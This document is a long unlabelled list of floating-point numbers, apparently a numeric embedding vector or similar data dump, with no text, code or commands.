0.0014446433633565903, -0.04469090700149536, -0.021494820713996887, 0.011737088672816753, 0.03260211646556854, -0.02654953859746456, -0.011074576526880264, -0.029968425631523132, -0.004326773341745138, -0.010387527756392956, 0.0036192764528095722, 0.014714301563799381, 0.0022615366615355015, -0.007745660375803709, -0.022051004692912102, 0.03346910700201988, 0.004850239492952824, 0.012980320490896702, 0.005439138505607843, 0.016170190647244453, -0.018730266019701958, 0.008972533978521824, -0.02020251378417015, -0.005860364995896816, 0.018861133605241776, -0.0253553818911314, 0.018075933679938316, -0.003206229070201516, 0.00677234074100852, -0.012530466541647911, 0.00018620358605403453, -0.004347221460193396, 0.01589209958910942, 0.007267179898917675, -0.015155975706875324, -0.042858775705099106, -0.011655297130346298, -0.001395568484440446, 0.00512424111366272, -0.00691547617316246, 0.0030365115962922573, 0.008694442920386791, 0.012391421012580395, 0.030001142993569374, -0.002588702831417322, -0.024717409163713455, -0.002023318549618125, -0.03487591817975044, -0.029902992770075798, -0.029952067881822586, 0.00691547617316246, 0.019139224663376808, -0.014166297391057014, 0.000251892430242151, 0.0010960068320855498, 0.012154225260019302, 0.005201943218708038, 0.01863211579620838, -0.01214604638516903, -0.023359669372439384, -0.015344096347689629, -0.002093863906338811, 0.004964747466146946, -0.011401742696762085, 0.018648475408554077, -0.023654118180274963, -0.015049646608531475, -0.007492106407880783, 0.010109436698257923, -0.005181495100259781, 0.03170240670442581, -0.030819058418273926, -0.008036020211875439, 0.016088400036096573, 0.03278205543756485, -0.0325857549905777, -0.01740524359047413, -0.02399764209985733, -0.011704372242093086, -0.007598435506224632, 0.03356725350022316, 0.01513143815100193, 0.0294776763767004, -0.01131995115429163, 0.009160654619336128, -0.025960640981793404, -0.028676120564341545, 0.013888206332921982, 0.025208158418536186, -0.01621926575899124, 0.0179287102073431, 0.027203872799873352, -0.000892039155587554, -0.009643224999308586, -0.010960068553686142, 0.005541378166526556, 0.04498535767197609, 0.00026249978691339493, -0.013871847651898861, -0.002619374543428421, 0.007786556147038937, 0.007978766225278378, -0.02936316840350628, 0.013961819000542164, 0.0009968345984816551, -0.0017943022539839149, -0.014378955587744713, -0.015319558791816235, 0.0027195692528039217, -0.0035988285671919584, 0.0029117793310433626, 0.030998999252915382, 0.008465426042675972, 0.0008301843190565705, 0.009054325520992279, -0.014771555550396442, -0.0028074951842427254, -0.013929102569818497, -0.028218086808919907, -0.01621926575899124, 0.011058218777179718, 0.03080270066857338, -0.016636403277516365, 0.007144492585211992, -0.030442817136645317, -0.007389867212623358, 0.024553826078772545, 0.030769983306527138, 0.023637760430574417, -0.02448839135468006, 0.013454711064696312, -0.00791742280125618, -0.007385777775198221, 0.010763769038021564, 0.006461532786488533, 0.0007351016392931342, 0.004653939511626959, 0.01838674210011959, 0.014542538672685623, 0.006862311623990536, 0.00016141052765306085, 0.0034863650798797607, -0.0016460551414638758, -0.007344882003962994, -0.02730202116072178, 0.026255089789628983, -0.014918779954314232, -0.028005428612232208, 0.007950139231979847, 0.035399384796619415, 0.0018086157506331801, -0.013078469783067703, -0.008334559388458729, -0.006874580401927233, 0.024439318105578423, 0.01900835707783699, -0.011867955327033997, 0.0015785770956426859, -0.016440102830529213, 0.027432888746261597, -0.008158707991242409, 0.051070649176836014, -0.02177291177213192, -0.008629009127616882, -0.00691547617316246, -0.012792199850082397, -0.010477498173713684, -0.0005745856906287372, -0.023654118180274963, -0.013266590423882008, -0.00677234074100852, 0.010150332003831863, -0.03373083844780922, -0.023196086287498474, -0.010362990200519562, -0.002025363501161337, -0.009831344708800316, -0.000263010966591537, -0.011900671757757664, 0.01892656646668911, 0.02321244403719902, -0.0004260829009581357, -0.005353257525712252, 0.03196414187550545, -0.021462105214595795, 0.022280020639300346, 0.0003366233722772449, -0.0331910140812397, -0.0193845983594656, -0.0012422092258930206, -0.014174477197229862, -0.023032503202557564, 0.013961819000542164, -0.056763339787721634, 0.01202335860580206, 0.013307486660778522, -0.004523073323071003, 0.0034802306909114122, -0.008956175297498703, -0.0022962980438023806, -0.01001946534961462, -0.00044244120363146067, -0.007680227048695087, -0.015352275222539902, -0.01814136654138565, 0.019139224663376808, 0.10148696601390839, -0.014182656072080135, 0.017388885840773582, -0.0075248233042657375, 0.014460747130215168, 0.01072287280112505, 0.0012861721916124225, -0.0031857811845839024, -0.007913333363831043, 0.02234545350074768, 0.012939424254000187, -0.006064843852072954, -0.004887045361101627, 0.029543111100792885, 0.02012072317302227, -0.00157959945499897, -0.016799986362457275, -0.014501643367111683, 0.03736238181591034, -0.015155975706875324, -0.009635045193135738, 0.003956666681915522, 0.007107686251401901, -0.026860347017645836, 0.0346469022333622, -0.017290735617280006, -0.0032123634591698647, -0.01719258539378643, -0.04622858762741089, -0.019368240609765053, -0.007099507376551628, -0.021249447017908096, -0.007610704284161329, -0.008383634500205517, 0.001315821660682559, 0.020562397316098213, 0.00427769822999835, -0.008481784723699093, -0.013888206332921982, -0.0023903583642095327, -0.00925880391150713, 0.001075558946467936, -0.021740196272730827, -0.009177012369036674, 0.013004858046770096, -0.016382848843932152, 0.0049974643625319, 0.004408564884215593, -0.027596471831202507, -0.00043068366358056664, -0.01024848222732544, -0.031686048954725266, 0.031015358865261078, 0.015622187405824661, 0.009250625036656857, 0.029575826600193977, 0.0010321071604266763, -0.011843417771160603, -0.0052469284273684025, -0.025093650445342064, -0.0027563755866140127, -0.003388215322047472, -0.034908637404441833, -0.0018975641578435898, 0.008907100185751915, -0.00590535020455718, -0.014485284686088562, 0.011393563821911812, -0.020022572949528694, 0.013421994633972645, 0.01971176452934742, 0.01702900230884552, 0.0003366233722772449, -0.007254911120980978, -0.00024511906667612493, 0.004927941132336855, 0.023572327569127083, 0.03229130804538727, -0.017879635095596313, -0.007974676787853241, 0.04292421042919159, 0.02993571013212204, -0.007124044466763735, 0.033501822501420975, -0.004486266989260912, 0.026238732039928436, -0.016963569447398186, -0.012154225260019302, -0.002768644131720066, -0.00485432893037796, 0.0033473195508122444, 0.005201943218708038, 0.013364740647375584, 0.020676905289292336, 0.010027645155787468, 0.009078863076865673, 0.016611864790320396, -0.0096922991797328, -0.010829201899468899, 0.0020059379749000072, -0.01624380238354206, -0.006567861884832382, 0.01814136654138565, 0.004960658028721809, -0.00487477658316493, -0.00862083025276661, 0.01117272675037384, 0.013929102569818497, 0.01879570074379444, -0.012415958568453789, -0.04135381057858467, -0.0016174280317500234, 0.013184798881411552, 0.004666208289563656, -0.0072753592394292355, 0.02077505551278591, 0.01055928971618414, -0.0023412832524627447, -0.0009554276475682855, -0.0272202305495739, -0.017879635095596313, -0.036969784647226334, 0.040601328015327454, -0.0179287102073431, 0.009307879023253918, -0.024962782859802246, -0.011835237964987755, -0.0070218052715063095, 0.022001929581165314, 0.020137080922722816, 0.03657718375325203, 0.0012984409695491195, -0.013986356556415558, -0.008882563561201096, 0.018108651041984558, -0.0023985374718904495, 0.024815557524561882, 0.006956371944397688, -0.006367472931742668, 0.006895028054714203, -0.014149939641356468, 0.006342935375869274, 0.020235231146216393, 0.005684513133019209, -0.015826666727662086, -0.0069072968326509, 0.009168833494186401, -0.011287234723567963, 0.006428816355764866, 0.010878277011215687, 0.000961050798650831, -0.03575927019119263, 0.017994143068790436, 0.031178941950201988, 0.002474194625392556, 0.01982627436518669, 0.014419851824641228, -0.01773240976035595, -0.008424530737102032, 0.004408564884215593, 0.011229980736970901, -0.008907100185751915, 0.01672637276351452, 0.008203692734241486, -0.02223094552755356, 0.025502607226371765, 0.00806873757392168, -0.03615186735987663, -0.00810963287949562, -0.015409529209136963, 0.021952854469418526, -0.010199407115578651, -0.006191621068865061, 0.014068148098886013, 0.0074634794145822525, 0.0019169895676895976, -0.004028234165161848, 0.021920137107372284, 0.028872419148683548, -0.043971139937639236, -0.012285091914236546, 0.025142725557088852, 0.011238159611821175, 0.01835402473807335, 0.014812450855970383, -0.02684398926794529, -0.015573112294077873, 0.015990249812602997, -0.021969212219119072, 0.029592186212539673, 0.0002191758103435859, 0.033665403723716736, -0.012407778762280941, -0.013462889939546585, 0.007614794187247753, -0.018615758046507835, -0.005901260767132044, -0.0157775916159153, -0.0018403100548312068, -0.0038135312497615814, 0.010044002905488014, -0.005430959165096283, -0.004580327309668064, -0.005471855401992798, -0.00454761041328311, -0.03386170417070389, -0.005565915256738663, -0.005263286642730236, -0.005672244355082512, -0.009831344708800316, -0.011974284425377846, 0.010673798620700836, -0.004952478688210249, -0.004388117231428623, -0.005815379787236452, 0.020954996347427368, -0.007479838095605373, -0.023245161399245262, 0.007438942324370146, 0.0060280379839241505, -0.008997071534395218, -0.005165136884897947, 0.011450817808508873, 0.006968640722334385, -0.003944397903978825, 0.01274312473833561, 0.03291292116045952, -0.04976198449730873, 0.013201157562434673, 0.03072090819478035, -0.029003286734223366, -0.010821023024618626, -0.005962604656815529, 0.004653939511626959, -0.0011481490219011903, -0.03042645938694477, 0.018370384350419044, 0.004617133177816868, 0.001099074026569724, -0.008604471571743488, 0.018174083903431892, -0.020317023620009422, -0.025617115199565887, -0.012481391429901123, 0.022132795304059982, -0.00016192172188311815, -0.001545860432088375, -0.00527964485809207, -0.02052967995405197, 0.0379185676574707, -0.011655297130346298, 0.011418101377785206, -0.0024966872297227383, -0.015000571496784687, -0.006032127421349287, 0.01814136654138565, 0.015196871012449265, -0.007222194690257311, 0.0290687195956707, 0.009823165833950043, -0.0026704943738877773, -0.0069481926038861275, -0.0023065218701958656, 0.006424726918339729, -0.027056647464632988, 0.04011058062314987, -0.0069072968326509, -0.002161341952160001, 0.013094828464090824, -0.012628616765141487, 0.015883920714259148, 0.0005367571138776839, -0.0026275538839399815, -0.009864062070846558, 0.0008956175297498703, -0.00981498695909977, 0.007029984146356583, -0.014468926005065441, -0.003809441812336445, -0.007177209015935659, -0.019646331667900085, 0.06458261609077454, 0.009904957376420498, -0.018730266019701958, 0.021576613187789917, -0.045705121010541916, -0.023735910654067993, -0.00884166732430458, 0.0016501446953043342, -0.017388885840773582, -0.013266590423882008, 0.005827648565173149, -0.00734079210087657, -0.013642831705510616, 0.026533180847764015, 0.005983052309602499, -0.01145899761468172, 0.004310415126383305, -0.023784983903169632, 0.012407778762280941, 0.0031857811845839024, 0.028806986287236214, 0.01637466996908188, -0.006968640722334385, -0.007954228669404984, 0.004960658028721809, -0.007303986232727766, -0.013299306854605675, -0.0005572049994952977, -0.032716624438762665, 0.0085553964599967, -0.009160654619336128, -0.008432709611952305, -0.01773240976035595, -0.0010684021981433034, -0.025535324588418007, -0.0017943022539839149, -0.00021981481404509395, -0.012317808344960213, -0.003954621963202953, 0.008686263114213943, 0.0006507540820166469, -0.06333938241004944, -0.016497356817126274, -0.004171369597315788, 0.008027841337025166, 0.015327737666666508, -0.003285975893959403, -0.015245946124196053, -0.03163697570562363, 0.017012644559144974, 0.008530859835445881, 0.028136296197772026, 0.007831541821360588, -0.0015295021003112197, -0.015106900595128536, 0.011123651638627052, -0.0013700085692107677, -0.013299306854605675, 0.005312361754477024, -0.030622759833931923, 0.016415566205978394, -0.012661333195865154, 0.025289949029684067, 0.0093814916908741, 0.0005083856522105634, -0.0020458113867789507, 0.00010722361912485212, 0.006686459761112928, -0.02326151914894581, 0.008669905364513397, -0.010951889678835869, 0.005962604656815529, 0.0025866578798741102, 0.0075248233042657375, -0.006661922205239534, -0.009839524514973164, 0.020758697763085365, 0.03286384791135788, -0.02676219679415226, -0.017716052010655403, 0.012816737405955791, -0.010477498173713684, -0.0035538431257009506, 0.015982070937752724, -0.00851450115442276, 0.022525394335389137, 0.015802128240466118, 0.01843581721186638, -0.006694639101624489, -0.0038155762013047934, 0.016832701861858368, 0.0045639690943062305, 0.013094828464090824, 0.008273215964436531, -0.025224516168236732, 0.013749160803854465, -0.013135723769664764, -0.013168441131711006, 0.03451603651046753, 0.008530859835445881, -0.018108651041984558, -0.0032082737889140844, 0.007291717454791069, -0.008956175297498703, -0.009373312816023827, -0.00878441333770752, 0.011614400893449783, -0.002106132684275508, -0.017307093366980553, -0.0008342738728970289, 0.00839181337505579, 0.01218694169074297, 0.021903779357671738, -0.0008997071417979896, 0.02301614359021187, -0.009046146646142006, 0.004878866486251354, -0.030524609610438347, 0.0028340774588286877, 0.017585184425115585, -0.008199603296816349, 0.005561825819313526, 0.01814136654138565, 0.030197443440556526, 0.0060035004280507565, 0.01572851650416851, 0.0019077881006523967, 0.035104937851428986, -0.01361011527478695, 0.02234545350074768, -0.0035436192993074656, -0.020006215199828148, -0.028087221086025238, -0.025633474811911583, 0.005525019485503435, 0.01148353423923254, 0.007087238598614931, -0.01410086452960968, 0.0024762393441051245, 0.007316255010664463, -0.010731052607297897, -0.04249889403581619, -0.024063076823949814, 0.01278402004390955, -0.00705043226480484, -0.004649850074201822, -0.013585577718913555, -0.015303200110793114, -0.03335459530353546, -0.0029588094912469387, 0.0022247303277254105, 0.0024435226805508137, 0.005839917343109846, 0.017945067957043648, 0.013389278203248978, -0.04249889403581619, -0.01616201177239418, 0.0051733157597482204, -0.009373312816023827, 0.007721122819930315, -0.013078469783067703, -0.02825080417096615, 0.0031428406946361065, -0.004760268609970808, -0.018010500818490982, -0.011761626228690147, 0.0019619748927652836, 0.0007330568041652441, 0.0013332023518159986, 0.01884477399289608, 0.0003113191050942987, 0.016718193888664246, 0.019270090386271477, 0.0022962980438023806, -0.012923065572977066, 0.015147796832025051, -0.004003696609288454, -0.0077906460501253605, -0.00038493151078000665, 0.004269519355148077, -0.00315510923974216, 0.014297164045274258, 0.0034720515832304955, 0.01334020309150219, 0.01100914366543293, -0.0006931834504939616, 0.010044002905488014, -0.0070586116053164005, -0.01702900230884552, 0.009340595453977585, 0.008101454004645348, 0.008015573024749756, -0.0023903583642095327, 0.004899314139038324, -0.01900835707783699, -0.01605568267405033, -0.010690156370401382, -0.0040998016484081745, -0.011287234723567963, 0.005455496720969677, 0.004273608792573214, -0.00585627555847168, 0.018501250073313713, -0.006118008401244879, 0.007856079377233982, -0.00022313759836833924, 0.008113722316920757, 0.010371169075369835, 0.026860347017645836, 0.005541378166526556, 0.007651600055396557, 0.0096922991797328, 0.005165136884897947, 0.01930280774831772, 0.01941731572151184, 0.01702900230884552, 0.029019644483923912, -0.003077407367527485, -0.021838346496224403, 0.014444389380514622, -0.017094435170292854, 0.01987534761428833, 0.0014456657227128744, 0.004572147969156504, -0.007921512238681316, -0.004903404042124748, 0.008473604917526245, 0.015376812778413296, -0.016276519745588303, 0.007156761363148689, -0.012129687704145908, -0.012358704581856728, -0.004110025707632303, 0.0013055977178737521, 0.00029240481671877205, -0.007807004265487194, -0.013168441131711006, -0.0255680400878191, -0.005071076564490795, 0.0073203444480896, 0.00867808423936367, -0.000502506853081286, -0.018125008791685104, 0.007029984146356583, 0.007279448676854372, 0.02746560424566269, 0.000018770522729028016, 0.0022922083735466003, -0.009782270528376102, 0.009986748918890953, 0.004895224701613188, -0.012980320490896702, -0.0018730266019701958, -0.008702621795237064, 0.004866597708314657, 0.00021840901172254235, -0.009700478985905647, 0.0047316416166722775, -0.00469892518594861, 0.0057376776821911335, -0.01523776724934578, -0.0012074478436261415, 0.023817701265215874, -0.003400484099984169, 0.0010673798387870193, -0.010624723508954048, -0.0010816933354362845, -0.014648867771029472, -0.00023987930035218596, -0.008072827011346817, -0.0024762393441051245, -0.0032409904524683952, -0.017585184425115585, 0.0010464207734912634, 0.015826666727662086, 0.01354468148201704, 0.0031142134685069323, 0.0026152851060032845, 0.0173234511166811, 0.006220248062163591, -0.02432480826973915, 0.01946639083325863, -0.0028995107859373093, 0.021871061995625496, 0.011573505587875843, -0.0033616330474615097, -0.005373705178499222, 0.0015734650660306215, -0.0034965891391038895, -0.0028790629003196955, 0.010166690684854984, 0.0025559861678630114, 0.0018035038374364376, -0.0032103185076266527, 0.006854132283478975, 0.007598435506224632, -0.019286449998617172, 0.00039311067666858435, 0.0016051592538133264, 0.010731052607297897, -0.0019302807049825788, -0.033289164304733276, -0.016047503799200058, -0.004649850074201822, -0.0193845983594656, 0.019564541056752205, 0.004001651890575886, -0.016276519745588303, -0.0062284269370138645, 0.007083148695528507, 0.01822315901517868, -0.02416122518479824, -0.000962073216214776, -0.013045753352344036, -0.018075933679938316, -0.007353060878813267, -0.012162404134869576, -0.012767662294209003, 0.0010919172782450914, -0.013192977756261826, 0.01203971728682518, -0.012996678240597248, -0.007189477793872356, -0.011262697167694569, 0.001659346162341535, 0.05326266214251518, -0.0047071040607988834, -0.003936218563467264, -0.013716444373130798, 0.004138652700930834, -0.005103792995214462, -0.006813236512243748, -0.003375946544110775, -0.001841332414187491, 0.0009283341933041811, 0.012841274030506611, -0.015319558791816235, -0.02407943457365036, -0.032798413187265396, 0.012162404134869576, 0.0036806201096624136, -0.006825505290180445, 0.002838167129084468, 0.008956175297498703, 0.00734897144138813, 0.01145899761468172, -0.03373083844780922, 0.022754410281777382, -0.013062112033367157, -0.006383831147104502, -0.0016143608372658491, 0.01802685856819153, 0.012914886698126793, -0.008588113822042942, 0.040601328015327454, -0.008166886866092682, -0.010976427234709263, 0.015982070937752724, 0.011262697167694569, -0.009487820789217949, -0.0070095364935696125, -0.0038176209200173616, 0.002234954386949539, -0.005332809407263994, 0.020071648061275482, 0.03165333345532417, -0.009029787965118885, -0.005349167622625828, 0.010420244187116623, -0.004482177551835775, 0.006571951787918806, -0.0012831049971282482, 0.00558636337518692, 0.0062284269370138645, -0.006179352290928364, -0.004060950595885515, 0.008702621795237064, 0.012137867510318756, -0.012440496124327183, 0.017748767510056496, 0.0065310560166835785, -0.006792788859456778, 0.017421601340174675, 0.0014742928324267268, 0.009847703389823437, -0.00037803035229444504, 0.016333773732185364, 0.022983428090810776, 0.002037632279098034, -0.004003696609288454, 0.009414208121597767, -0.02102043107151985, 0.023196086287498474, -0.013307486660778522, -0.00806464720517397, 0.006776430644094944, -0.006375651806592941, -0.022574469447135925, 0.011017322540283203, 0.01121362205594778, 0.003662216942757368, 0.0015162109630182385, -0.0013679638504981995, -0.00884166732430458, -0.020431531593203545, 0.002825898351147771, -0.009103400632739067, -0.0009022630983963609, -0.004510804545134306, 0.0069604613818228245, -0.01578577049076557, 0.006666012108325958, 0.0008306954987347126, -0.0024762393441051245, -0.02828351967036724, -0.020218873396515846, 0.005852186121046543, 0.0005449362215586007, 0.010927352122962475, 0.03392713889479637, 0.0006599556072615087, 0.010461140424013138, 0.016194729134440422, -0.0028095399029552937, 0.005692692473530769, 0.0016153831966221333, -0.005794931668788195, 0.013160261325538158, -0.008318201638758183, 0.023441459983587265, -0.005917618982493877, -0.0074634794145822525, -0.002666404703631997, -0.006109829526394606, 0.009888599626719952, -0.0049974643625319, -0.016170190647244453, 0.016832701861858368, 0.01564672403037548, 0.0028811076190322638, 0.005553646944463253, 0.03018108382821083, -0.011835237964987755, 0.005860364995896816, 0.0005331787397153676, -0.02139667049050331, -0.023310594260692596, -0.015376812778413296, -0.006097560748457909, -0.002300387481227517, 0.02291799522936344, 0.01024848222732544, -0.009888599626719952, -0.000018051652659778483, -0.015139617025852203, 0.002298342762514949, -0.01084556058049202, -0.006559683009982109, -0.002735927700996399, 0.027236588299274445, -0.0072630904614925385, -0.012195121496915817, -0.005062897223979235, -0.00931605789810419, 0.01646464131772518, -0.020971355959773064, 0.006764161866158247, -0.019515465945005417, 0.014616151340305805, -0.002780912909656763, 0.005398242734372616, -0.010256661102175713, 0.0017431825399398804, 0.008252767845988274, 0.0011297458549961448, -0.01148353423923254, 0.009536895900964737, -0.013209336437284946, -0.025208158418536186, 0.005782662890851498, 0.027563754469156265, 0.009618687443435192, 0.03306014835834503, -0.0008879496017470956, -0.013969997875392437, 0.0001757240534061566, 0.000029601515052490868, -0.006821415852755308, 0.0005929887993261218, -0.01248957123607397, -0.014567076228559017, 0.025862490758299828, 0.004075264558196068, -0.005230570212006569, -0.018321309238672256, 0.025257233530282974, -0.020595114678144455, 0.015499499626457691, -0.002457836177200079, 0.018566682934761047, 0.004842060152441263, -0.014010894112288952, 0.001498830271884799, 0.02861068584024906, -0.0012381196720525622, -0.013152082450687885, 0.001807593391276896, 0.0077170333825051785, -0.013127544894814491, 0.0026929869782179594, 0.011720729991793633, -0.012342345900833607, -0.009046146646142006, -0.009733195416629314, 0.00909522082656622, -0.022623544558882713, 0.002220640890300274, 0.007189477793872356, -0.018206801265478134, -0.008399993181228638, -0.029330452904105186, -0.0029588094912469387, -0.0014385089743882418, 0.009937673807144165, 0.01909014955163002, 0.002977212658151984, 0.004144787322729826, 0.0055086612701416016, -0.00016434991266578436, -0.013127544894814491, 0.008440888486802578, -0.024831917136907578, 0.0022922083735466003, 0.00043170605204068124, -0.014199014753103256, -0.0032430351711809635, 0.0025989266578108072, -0.00010888501128647476, -0.012751303613185883, 0.019073791801929474, 0.003535439958795905, -0.0031326166354119778, -0.01090281456708908, -0.013021215796470642, -0.006436995696276426, 0.001054088701494038, -0.014992392621934414, -0.012137867510318756, -0.0103057362139225, 0.0011225891066715121, -0.016096578910946846, -0.010649261064827442, -0.0012739035300910473, -0.009037966839969158, -0.013184798881411552, 0.00018109161464963108, -0.011761626228690147, -0.014468926005065441, 0.02704028971493244, 0.0029935711063444614, -0.015164154581725597, 0.012121508829295635, -0.007541181519627571, 0.015270483680069447, -0.01743795908987522, 0.030082935467362404, -0.0015407484024763107, -0.01278402004390955, 0.0008961287676356733, 0.004028234165161848, 0.017666976898908615, -0.0052714659832417965, 0.0015622187638655305, 0.0208241306245327, -0.0014006803976371884, -0.009103400632739067, -0.0272202305495739, -0.021494820713996887, -0.004171369597315788, 0.011663476005196571, -0.0020795504096895456, 0.001877116272225976, -0.03227495029568672, -0.018043218180537224, -0.003582470118999481, -0.013103007338941097, -0.0034740963019430637, -0.021004071459174156, 0.002852480625733733, -0.00882530864328146, -0.009945853613317013, 0.001156328129582107, 0.017176227644085884, -0.00427769822999835, 0.003044690703973174, -0.01605568267405033, -0.010747410356998444, -0.03644631803035736, 0.02102043107151985, 0.01361011527478695, 0.017127152532339096, -0.01100914366543293, -0.006146635394543409, 0.0050547183491289616, -0.010624723508954048, 0.0014231731183826923, 0.012734945863485336, -0.005627259146422148, -0.013994535431265831, -0.011058218777179718, -0.0027441068086773157, -0.012604079209268093, 0.03513765335083008, 0.028218086808919907, -0.0025580308865755796, 0.004866597708314657, 0.007017715834081173, 0.012088792398571968, 0.002255402272567153, 0.008727159351110458, -0.002701166085898876, 0.004792985040694475, 0.013929102569818497, 0.0106165437027812, 0.01127905584871769, -0.009888599626719952, -0.0010612454498186707, -0.005381884519010782, 0.019973497837781906, -0.0037153814919292927, -0.008645367808640003, -0.00631839781999588, 0.0072508216835558414, 0.022410886362195015, -0.008481784723699093, -0.01727437600493431, -0.010853739455342293, -0.016767269000411034, 0.003899412462487817, 0.03294564038515091, 0.01599842868745327, -0.0045026252046227455, 0.007001357153058052, 0.009070683270692825, -0.005095614120364189, 0.014706121757626534, -0.006739624310284853, -0.018566682934761047, 0.006134366616606712, 0.008170976303517818, 0.00925880391150713, 0.021036788821220398, 0.02177291177213192, -0.033370956778526306, 0.003973024897277355, 0.001487583969719708, -0.01646464131772518, -0.00836318638175726, -0.011254518292844296, -0.01527866255491972, -0.015098721720278263, 0.006428816355764866, -0.022459961473941803, -0.022607186809182167, -0.015843024477362633, 0.0057744840160012245, 0.00397915905341506, 0.013700085692107677, -0.008224140852689743, 0.012530466541647911, 0.016399206593632698, -0.023801343515515327, -0.0016859284369274974, -0.025175441056489944, -0.008305932395160198, -0.0077170333825051785, 0.008260947652161121, 0.007140403147786856, -0.03582470118999481, -0.00974955316632986, -0.009160654619336128, 0.00485432893037796, -0.012456853874027729, -0.010771947912871838, -0.0016910404665395617, -0.029919352382421494, -0.012702228501439095, 0.00169308518525213, 0.004285877570509911, -0.0037501428741961718, 0.004015965387225151, 0.003251214511692524, 0.001568353152833879, -0.01057564839720726, -0.01949910633265972, -0.011548968032002449, -0.009635045193135738, -0.005754035897552967, -0.010657439939677715, -0.026255089789628983, -0.013184798881411552, -0.021920137107372284, -0.012759482488036156, -0.0008209827356040478, -0.00942238699644804, -0.0014211282832548022, 0.0028688388410955667, 0.009839524514973164, -0.006698728539049625, 0.006167083512991667, -0.005844006780534983, 0.01879570074379444, -0.017503393813967705, 0.024144867435097694, 0.005655886139720678, -0.0007642398704774678, 0.012972140684723854, 0.013855489902198315, -0.00806873757392168, -0.00002760465031315107, -0.019122866913676262, -0.0030978552531450987, -0.005013822577893734, -0.015532216988503933, -0.028545252978801727, -0.010403886437416077, 0.047569967806339264, 0.0028565700631588697, -0.007602525409311056, 0.007807004265487194, -0.000268634146777913, -0.013618294149637222, -0.01656278967857361, 0.019908064976334572, -0.001988557167351246, -0.01486152596771717, 0.014673405326902866, -0.014976033940911293, -0.006878669839352369, 0.010150332003831863, -0.007635241840034723, 0.010600185953080654, -0.028479820117354393, -0.026026073843240738, -0.010943710803985596, -0.02074233815073967, -0.019597256556153297, 0.016750911250710487, 0.0045148939825594425, -0.0018035038374364376, 0.009234266355633736, -0.010264839977025986, -0.0005434026825241745, 0.006130277179181576, -0.0031019446905702353, 0.008653546683490276, 0.029003286734223366, -0.004204086028039455, 0.02223094552755356, 0.011033681221306324, -0.027449246495962143, -0.014853347092866898, 0.012375062331557274, -0.0075738984160125256, -0.00008639233419671655, -0.00590535020455718, 0.013438352383673191, 0.02188742160797119, 0.01181070040911436, -0.001716600265353918, 0.01377369835972786, -0.012285091914236546, -0.019842632114887238, -0.002975167939439416, -0.0006374629447236657, 0.021347597241401672, 0.017503393813967705, 0.010199407115578651, -0.008166886866092682, -0.0005418690852820873, -0.01987534761428833, -0.000492538558319211, -0.0069849989376962185, 0.015532216988503933, -0.010526573285460472, -0.010093078017234802, -0.027612829580903053, -0.01235052477568388, 0.04230259358882904, 0.00871897954493761, 0.008416350930929184, -0.008776234462857246, -0.00035374847357161343, 0.006044396199285984, 0.002376044634729624, -0.018910208716988564, -0.017748767510056496, 0.03265118971467018, -0.009700478985905647, -0.020431531593203545, -0.0008664792985655367, 0.021494820713996887, 0.0036254108417779207, 0.011082756333053112, -0.0033923047594726086, 0.013790056109428406, -0.008882563561201096, 0.02952675148844719, 0.030851775780320168, -0.011246339417994022, 0.027449246495962143, 0.019679049029946327, -0.023245161399245262, -0.002038654638454318, -0.01751975156366825, -0.010632902383804321, 0.027596471831202507, -0.010273019783198833, -0.0023780895862728357, -0.000995812239125371, 0.0027727338019758463, 0.012530466541647911, 0.011508071795105934, -0.01743795908987522, 0.0009707635617814958, -0.02052967995405197, 0.013160261325538158, 0.018075933679938316, -0.00391168100759387, 0.0044658188708126545, -0.007201746571809053, 0.0013638741802424192, -0.011434460058808327, -0.002277894876897335, -0.010354811325669289, -0.008179156109690666, -0.01290670782327652, 0.00588490255177021, -0.000043196167098358274, -0.0005786752444691956, -0.029821202158927917, 0.01879570074379444, 0.0037480981554836035, -0.01884477399289608, -0.005938067100942135, -0.005345078185200691, -0.01214604638516903, 0.02882334403693676, -0.017208943143486977, 0.012563182972371578, -0.0008429642184637487, -0.007839720696210861, 0.01925373263657093, 0.014665226452052593, 0.010551110841333866, 0.009365133009850979, -0.01922101527452469, -0.0025437173899263144, 0.005140599329024553, -0.006678280420601368, -0.012587720528244972, 0.025093650445342064, 0.00212862528860569, -0.01352014485746622, 0.004919762257486582, -0.008457247167825699, -0.01305393222719431, -0.00249464251101017, 0.0049688369035720825, -0.03034466691315174, 0.009757732972502708, -0.0050301807932555676, -0.0016235624207183719, -0.0032307663932442665, -0.006563772447407246, -0.015556754544377327, -0.00931605789810419, 0.025960640981793404, 0.0014691808028146625, 0.006158904172480106, 0.011238159611821175, -0.014125402085483074, 0.026124224066734314, 0.005827648565173149, 0.0023719551973044872, -0.0077170333825051785, 0.03314193710684776, -0.009986748918890953, -0.000022173180695972405, -0.018043218180537224, -0.0057622152380645275, -0.01871390827000141, 0.029821202158927917, 0.01949910633265972, 0.002038654638454318, 0.015319558791816235, 0.009340595453977585, -0.02903600223362446, -0.00705043226480484, -0.007393956650048494, -0.0009457148844376206, 0.011303593404591084, -0.0009063527104444802, -0.008338648825883865, -0.014329880475997925, 0.0065310560166835785, -0.016849061474204063, 0.0005628281505778432, 0.019319165498018265, -0.009553253650665283, 0.007925601676106453, -0.01317662000656128, 0.00909522082656622, -0.0011829104041680694, -0.018452174961566925, -0.0015601739287376404, -0.01884477399289608, 0.009536895900964737, 0.010526573285460472, 0.003968935459852219, -0.01781420037150383, 0.0009477596613578498, -0.02239452861249447, -0.02156025357544422, 0.004870687145739794, -0.015180513262748718, -0.0012882170267403126, 0.003042645985260606, 0.0020192291121929884, 0.002324925037100911, 0.02177291177213192, 0.0064942496828734875, 0.006956371944397688, 0.0042654299177229404, -0.002656180877238512, 0.021658403798937798, 0.004416744224727154, 0.009970391169190407, -0.013266590423882008, -0.004187727812677622, 0.012137867510318756, 0.0037808148190379143, -0.011565325781702995, -0.00485432893037796, -0.00777428736910224, -0.001337291905656457, -0.01115636806935072, 0.01974448189139366, 0.03536666929721832, 0.0023637760896235704, -0.03899821266531944, 0.004760268609970808, 0.018419459462165833, 0.014256268739700317, -0.0011512162163853645, 0.015098721720278263, 0.0019721989519894123, 0.015123259276151657, -0.006424726918339729, -0.0012882170267403126, -0.004067085217684507, 0.0007361239986494184, -0.021331237629055977, 0.008252767845988274, 0.018910208716988564, -0.0208241306245327, -0.014820629730820656, 0.003833979135379195, 0.024259375408291817, 0.005803111009299755, 0.010812844149768353, -0.011843417771160603, -0.024308450520038605, -0.014902421273291111, 0.004936120472848415, -0.002758420305326581, -0.009414208121597767, -0.008588113822042942, 0.00958597008138895, -0.0015387036837637424, -0.0007591278990730643, -0.008007393218576908, -0.006563772447407246, -0.014485284686088562, 0.007398046553134918, -0.006179352290928364, 